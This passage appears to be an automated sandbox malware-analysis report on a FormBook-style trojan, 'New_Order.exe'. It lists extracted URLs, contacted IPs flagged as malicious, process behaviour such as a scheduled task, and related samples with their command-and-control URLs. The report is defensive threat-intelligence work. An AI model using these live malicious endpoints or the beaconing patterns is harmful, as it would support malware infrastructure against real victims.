                      http://www.wrautomotive.online/fdo5/?540H2x=tmpHADT4fdGVd6nnK8VfxTcjTEmAMjvmemW+C4Ol5iYH1IbYxa+keO9dRydEANAVQTW4GcRzv85KoC+8HtmJLO5vdlfv2fS0QQ==&fXUX=ShJ8DFcXvtj84pwtrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.quote2bill.com/fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=EAzFkHRwipdrFLRPzn8XfH22pTdKYWJnyl4LcH+flh+EU/cAs0/QFXMo9vl/d0UKRaBGjYTaeopZ/0cAzgqORqEzisMthiMtgw==true
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.kasegitai.tokyo/fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=EQwTHp3RZGFUPSUcH+83d++sEHXiHecksK53+uRoarOYzym5WINU/nAp376IAi0Fnc8MDGSrPwcAz9k7VILN2J3NqNX7kas5xg==true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.busan3-200.com/fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=o5wSqUvF0rpSj/QsxVSIlr771lB1q2yaUHYHmevxRJiNXHXH1dMi1Tu8dx6k0Oesk6U+KD/q+MB1YEvRLC9XlweWTzImNrywBQ==true
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.kasegitai.tokyo/fdo5/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.fdissolutions.net/fdo5/true
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabwextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.com/designersGNew_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/ac/?q=wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bTheNew_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designers?New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.transip.eu/knowledgebase/zoeken/wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.2092892717.0000000008493000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://img.sedoparking.comwextract.exe, 00000013.00000002.4167723777.0000000005886000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000002D16000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2093049974.000000000C436000.00000004.80000000.00040000.00000000.sdmpfalse
                                    		high
                                    https://www.transip.eu/services/search-domains/MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.tiro.comNew_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.transip.nl/services/search-domains/MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                        		high
                                        https://www.transip.nl/vragen/110000534/wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designersNew_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://transip.nl/MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                              		high
                                              http://www.goodfont.co.krNew_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_wextract.exe, 00000013.00000002.4167723777.0000000005886000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000002D16000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2093049974.000000000C436000.00000004.80000000.00040000.00000000.sdmpfalse
                                                		high
                                                http://www.sajatypeworks.comNew_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.typography.netDNew_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.founder.com.cn/cn/cTheNew_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.galapagosdesign.com/staff/dennis.htmNew_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://nl.trustpilot.com/review/www.transip.nlwextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://www.transip.eu/question/110000577/wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.kasegitai.tokyoMxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4168479789.0000000004CF8000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://transip.nl/cp/wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.transip.nl/algemene-voorwaarden/wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        		high
                                                        http://www.galapagosdesign.com/DPleaseNew_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://www.transip.nl/vragen/198/wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          http://www.busan3-200.com:80/fdo5/?fXUX=ShJ8DFcXvtj84pw&amp;540H2x=o5wSqUvF0rpSj/QsxVSIlr771lB1q2yaUwextract.exe, 00000013.00000002.4167723777.00000000061F2000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003682000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.fonts.comNew_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.sandoll.co.krNew_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://www.transip.nl/privacy-policy/wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              http://www.urwpp.deDPleaseNew_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.zhongyicts.com.cnNew_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNew_Order.exe, 00000000.00000002.1755763102.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, QjSljS.exe, 0000000B.00000002.1805856527.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.sakkal.comNew_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.apache.org/licenses/LICENSE-2.0New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.fontbureau.comNew_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://mozilla.org0/wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://crash-reports.mozilla.com/submit?id=wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.2092892717.0000000008493000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://transip.eu/cp/wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.transip.eu/question/110000576/wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://transip.eu/MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.transip.eu/knowledgebase/entry/284-start-sending-receiving-email-domain/wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.transip.eu/question/100000230wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.ecosia.org/newtab/wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.carterandcone.comlNew_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://trustpilot.com/review/www.transip.nlwextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.sedo.com/services/parking.php3firefox.exe, 0000001A.00000002.2093049974.000000000C436000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.transip.nl/vragen/110000580/wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://ac.ecosia.org/autocomplete?q=wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.fontbureau.com/designers/cabarga.htmlNNew_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.founder.com.cn/cnNew_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.fontbureau.com/designers/frere-user.htmlNew_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.transip.nl/vragen/110000572wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.jiyu-kobo.co.jp/New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://www.transip.eu/privacy-policy/wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.fontbureau.com/designers8New_Order.exe, 00000000.00000002.1761464417.0000000006C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.transip.nl/knowledgebase/zoeken/wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.transip.eu/terms-of-service/wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high

                                                                                              World Map of Contacted IPs

                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs

                                                                                              Public IPs

                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              91.195.240.94
                                                                                              		www.rssnewscast.comGermany
                                                                                              		47846SEDO-ASDEtrue
                                                                                              37.97.254.27
                                                                                              		wrautomotive.onlineNetherlands
                                                                                              		20857TRANSIP-ASAmsterdamtheNetherlandsNLtrue
                                                                                              109.68.33.25
                                                                                              		www.fdissolutions.netUnited Kingdom
                                                                                              		20738GD-EMEA-DC-LD5GBtrue
                                                                                              52.68.224.126
                                                                                              		busan3-200.comUnited States
                                                                                              		16509AMAZON-02UStrue
                                                                                              43.154.179.176
                                                                                              		www.waimaier2.storeJapan4249LILLY-ASUSfalse
                                                                                              185.151.30.138
                                                                                              		www.quote2bill.comUnited Kingdom
                                                                                              		48254TWENTYIGBtrue
                                                                                              66.29.155.54
                                                                                              		www.pay4dance.xyzUnited States
                                                                                              		19538ADVANTAGECOMUStrue
                                                                                              172.67.184.73
                                                                                              		www.poria.linkUnited States
                                                                                              		13335CLOUDFLARENETUStrue
                                                                                              202.172.28.202
                                                                                              		www.kasegitai.tokyoJapan37907DIGIROCKDigiRockIncJPtrue

                                                                                              General Information

                                                                                              Joe Sandbox Version:38.0.0 Ammolite
                                                                                              Analysis ID:1352630
                                                                                              Start date and time:2023-12-03 16:24:22 +01:00
                                                                                              Joe Sandbox Product:CloudBasic
                                                                                              Overall analysis duration:0h 12m 21s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:25
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:3
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample file name:New_Order.exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.spyw.evad.winEXE@32/16@12/9
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 80%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 89%
                                                                                              • Number of executed functions: 103
                                                                                              • Number of non-executed functions: 279
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe
                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                              Warnings

                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                              Simulations

                                                                                              Behavior and APIs

                                                                                              TimeTypeDescription
                                                                                              15:25:18Task SchedulerRun new task: QjSljS path: C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              16:25:17API Interceptor1x Sleep call for process: New_Order.exe modified
                                                                                              16:25:18API Interceptor63x Sleep call for process: powershell.exe modified
                                                                                              16:25:22API Interceptor1x Sleep call for process: QjSljS.exe modified
                                                                                              16:26:06API Interceptor11620773x Sleep call for process: wextract.exe modified

                                                                                              Joe Sandbox View / Context

                                                                                              IPs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              91.195.240.9400158007317748300pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • www.foiling.live/cvn0/?Znxxp=_r-hpbPp48Xt&WRtP=OUFssuxRjT58TyUhxgypKz41niC+Uw5jocVXQX5Iv/PCH/OYKmdk+YDbMR3FQAgoVyUTzKSYXPOn7SXxvbeg7iEdp95bRIpnTQ==
                                                                                              HURNER_Schweisstechni_L.L.C.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • www.webtoon.pro/0i3i/?LjW4DVtp=/Wpl803Xv+XwJZl9f1G3q6X/GrHU5UZm+OgimBuYLXJHLS3Mxd7FygKoe8gPWIyb1IFc+nT41rhGKBPPhXTqXUkiOne/kQrT0g==&KTJ=7R6dND
                                                                                              84LQ5L8BA4.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • www.foiling.live/cvn0/?2fqt=v8-8tfp&BbZtd=OUFssuxRjT58TyUhxgypKz41niC+Uw5jocVXQX5Iv/PCH/OYKmdk+YDbMR3FQAgoVyUTzKSYXPOn7SXxvbeg7iEdp95bRIpnTQ==
                                                                                              Advance_payment_against_import_BOE_No._5801890.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.worldlife.casino/udwf/?sZblj=S0-LSNghtB7Dt&FvolLxO=0+VI4KMvttXMFxlCaKqnfq3wi2PmqybRoCz89QoIIR0w4jAFPDnNPWfV6ciER1fR9woSXooUIsapvUc/xnikBTp6XdLhk8vYcA==
                                                                                              27112023110107pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • www.knowthehope.org/iv0r/?cHm4=CgSNALsNZkrXT/RxPCoV5AgnrT+dESoPNR2gMAiRMsR6i70xGeTDJ5b1g7AhXz2oL1JTImu/laA6Ch2G3ooH0PreGA8vuAQlKw==&vnkds=VfPlP
                                                                                              Burjeel__Royal__pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • www.webtoon.pro/0i3i/?NFO=/Wpl803Xv+XwJZl9f1G3q6X/GrHU5UZm+OgimBuYLXJHLS3Mxd7FygKoe8gPWIyb1IFc+nT41rhGKBPPhXTqXUkiOne/kQrT0g==&tHE=1dEX
                                                                                              file.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.rssnewscast.com/fdo5/?zf7=WxIPUXb0&7F=65uPmj+z4VpNJqA9pxY4t334WX7Mhk7tiYzSNqqY5uLzfvAkeCdzENkJlXyLUTYzEELB4+YwfPYf7gdekS/nySqpdkWMB4I85w==
                                                                                              justificante_de_pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • www.knowthehope.org/tr0n/?Bf8HB=mteZHdgFRBzFtvG6NfpE9w+EQgXI5VWvNqYIQQ/pv3nJuVf3etoJ9hWDc6LRL0mh8OBYhBPAMQ9eyaQPCpiQ6vqzhMwSwCjY8g==&VJT8B=wNKXcVY
                                                                                              Product_Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.beverlyformacon.net/tphs/?k8J0p=x/VkwFojgK1UunK6rR88UWIbVUovoUdAvLBM/RfhIyh8XYv6gfGTe/prsjAnOFfdpPCuRBVPvDVwlv+Ignw8pvkDrI9JiqZ7uA==&MpTl=KTct
                                                                                              Transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • www.knowthehope.org/tr0n/?v4Z0x=mteZHdgFRBzFtvG6NfpE9w+EQgXI5VWvNqYIQQ/pv3nJuVf3etoJ9hWDc6LRL0mh8OBYhBPAMQ9eyaQPCpiQ6vqzhMwSwCjY8g==&jXvh=oHLx2dapYZ
                                                                                              pedido.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • www.knowthehope.org/tr0n/?brGhZLrp=mteZHdgFRBzFtvG6NfpE9w+EQgXI5VWvNqYIQQ/pv3nJuVf3etoJ9hWDc6LRL0mh8OBYhBPAMQ9eyaQPCpiQ6vqzhMwSwCjY8g==&Cbcd0=b4bHkHcXD6v0b8a
                                                                                              9i6tQlNW5V.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.ihhslovenia.org/qbru/?ZTVHP=bWu9yiBou+FZdrZH54IU38dbRNZc6h2aUUVX4hTWoDZFlNghVJprQrvrZFACfJAxbDbBl5+hnaXgraKDNN0bzjAfvXhDc8nK5g==&ovEX8=kf0PWXLpe6
                                                                                              NEW_ORDERS_scan_29012019.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.worldlife.casino/udwf/?cVe=0+VI4KMvttXMFxlCaKqnfq3wi2PmqybRoCz89QoIIR0w4jAFPDnNPWfV6ciER1fR9woSXooUIsapvUc/xnikBTp6XdLhk8vYcA==&Y0cT=2RMH4RTHGN04j
                                                                                              PTDwRpT7xd.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.ihhslovenia.org/qbru/?NN=bWu9yiBou+FZdrZH54IU38dbRNZc6h2aUUVX4hTWoDZFlNghVJprQrvrZFACfJAxbDbBl5+hnaXgraKDNN0byhEDkE5DMc+J+Y3a4kiWj6tn&FRXLY=ltBdVjf
                                                                                              137-AGROCHLOPECKI_OFFER_list.xlsGet hashmaliciousFormBookBrowse
                                                                                              • www.worldlife.casino/g81o/?t8F43Dx=sIzOZeCdVxu+AixPGNw0tf5Q+CeIHvns/pzeWX8c3+hndAz/g3Q3WGHl0tDK0K9C91PRIfFg5UjF7CxDSt3oIahO0m0DinISxRyenq0=&xphPK=azPpsjMX1
                                                                                              DcVDfpyF4G.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.ihhslovenia.org/qbru/?Zngt1NK=bWu9yiBou+FZdrZH54IU38dbRNZc6h2aUUVX4hTWoDZFlNghVJprQrvrZFACfJAxbDbBl5+hnaXgraKDNN0awiAcukI9LNn34w==&uRjXa=C8KTarWhIdYH
                                                                                              stvtnhaf3hcj.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.ihhslovenia.org/n8tg/?98GPW=aH9x&rje=GkMii4fdEfohKjg8YiuMUGoy0dek1iEGgEnkGzJCZLbS84KTg2wXYBHCDdp/CrYmpHRGYiEe2vUNaVRuBfKNzjDF23lYhgoukg==
                                                                                              DHL_On_Demand_Delivery.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.365huay.pro/c6nd/?tLHdfha=DztciVDTXUCDNRbz40DAXkmcwNi9kyTwqKaojctrvHHfjSQ6ApL29KI/LlEZxLnCULgF+sAWqsN1muuuTjfj3VWIN2rGcFA67A==&o4=5HQ4hFjxThDtIpr0
                                                                                              Kwserhekrq.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.liuxuekuaile.com/ch4g/?8vUdxvwH=uheNWHpczC9DwtjVaqZvfE7vOXGy16mPEEV0NHOJnfw+uwzdcIRe7gcHq9c8tNOP9LA/MxGp+4FDzviusVNFFW6vxfFs3601Xx1Qm3hpK800&Fp=zBzdkNUhdbKPbn
                                                                                              mOkCDhmzHx.exeGet hashmaliciousFormBookBrowse
